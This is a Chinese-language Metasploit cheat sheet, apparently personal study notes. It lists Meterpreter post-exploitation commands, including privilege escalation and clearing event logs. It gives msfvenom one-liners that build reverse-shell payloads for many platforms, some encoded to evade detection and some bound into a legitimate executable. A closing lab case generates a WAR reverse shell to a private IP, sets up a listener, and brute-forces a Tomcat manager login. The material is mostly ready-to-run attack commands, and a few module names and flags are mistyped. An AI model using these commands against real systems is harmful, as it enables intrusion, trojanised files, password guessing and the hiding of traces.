Meatasploit 基础操作
MSF 渗透流程(自上而下)
序号 |
命令 |
说明 |
search 模块 |
根据收集的信息搜索 |
|
info 模块名 |
查看模块信息 |
|
use 模块名 |
选择模块 |
|
show payloads |
查看可以使用的攻击载荷 |
|
set payload |
设置攻击载荷 |
|
show targets |
查看攻击目标信息 |
|
show options/advance |
查看基本参数和高级参数 |
|
set name |
设置参数值 |
|
exploit/run |
执行攻击 |
|
session -l |
列出会话 |
|
session -i Id |
切换到指定会话 |
|
MSF 基本命令
命令 |
说明 |
msfconsole |
启动终端 |
banner |
展示 banner |
help /? |
查看帮助, help + 命令 |
search |
搜索漏洞和利用数据库 |
info |
查看模块的信息 |
use |
使用模块 |
show options |
查看所使用模块需要配置的参数 |
set |
设置参数值 |
run/exploit |
执行模块 |
back |
退回到主界面 |
quit/exit |
退出 msf |
核心模块说明
模块名 |
作用 |
Exploits |
利用模块 |
Payloads |
攻击载荷模块 |
Auxiliary |
辅助模块 |
Post |
后渗透模块 |
Encoders |
编码模块 |
Evasion |
免杀模块 (没什么暖用) |
Nops |
空模块 |
Meterpreter 中常用命令(这时你已经连上了 靶机)
命令 |
说明 |
sysinfo |
查看目标机系统信息 |
getuid |
查看用户 |
pwd/getIwd |
查看当前目录 |
cd/Icd |
切换目录 |
background |
把当前会话放到后台 |
sessions -i id |
切换到指定会话 |
sessions -k id |
杀死指定会话 |
shell |
进入目标主机 shell |
upload file |
向目标主机上传文件 |
download file |
从目标主机下载文件 |
search |
在目标主机上搜索文件 search -f test |
execute |
在目标主机执行程序 execute -H -i -f cmd.exe |
getsystem |
提权 |
clearev |
清楚痕迹 |
MSF 信息收集常用模块
作用 |
命令 |
主机发现 |
use auxiliary/scanner/discovery/arp_sweep |
端口扫描 |
use auxiliary/scanner/portscan/tcp |
目录扫描 |
use auxiliary/scanner/http/dir_scanner |
SSH爆破 |
use auxiliary/scanner/ssh/ssh_login |
mysql 服务发现 |
use auxiliary/scanner/mysql/mysql_version |
smb 服务发现 |
use auxiliary/scancer/smb/smb_version |
telnet 服务发现 |
use auxiliary/scanner/telnet/telnet_version |
rdp 服务发现 |
use auxiliary/scanner/rdp/rdp_scanner |
反弹 shell 相关
常用的反弹 shell
相关程序利用 |
命令 |
普通生成 |
msfvenom -p windows/meterpreter/reverse_tcp -f exe -o C:\back.exe |
编码处理型 |
msfvenom -p windows/meterpreter/reverse_tcp -i3 -e x86/shikata_ga_nai -f exe -o C:\back.exe |
捆绑 |
msfvenom -p windows/meterpreter/reverse tcp -platform windows -a x86 -x C:\nomal.exe -k -f exe -o C:\shell.exe |
Windows |
msfvenom -platform windows -a x86 -p windows/x64/meterpreter/reverse_tcp -f exe -o C:\back.exe |
Linux |
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf |
MAC |
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho |
PHP |
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php |
Asp |
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp |
Aspx |
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx |
JSP |
msfvenom -p java/jsp_shell reverse_tcp LHOST= LPORT= -f raw > shell.jsp |
War |
msfvenom -p java/jsp_shell reverse_tcp LHOST= LPORT= -f war > shell.war |
Bash |
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh |
Perl |
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl |
Python |
msfvenom -p python/meterpreter/reverser_tcp LHOST=LPORT= -f raw > shell.py |
反弹 shell 的利用案例
metasploit 外 使用 msfvenom 命令生成 反弹 shell 文件
1
| msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.132 lport=4444 -f war -o kali.war
|
metasploit 中利用
1 2 3 4 5 6
| use exploit/multi/handler show options set payload java/meterpreter/reverse_tcp set LHOST 192.168.142.132 set LPORT 4444 exploit
|
tomcat 密码爆破
1 2 3 4 5 6 7 8
| use auxiliary/scanner/http/tomcat_mgr_login show option sset RHOSTS 192.168.142.147 set THREADS 5 set BRUTEFORCE SPEED 3 show options exploit
|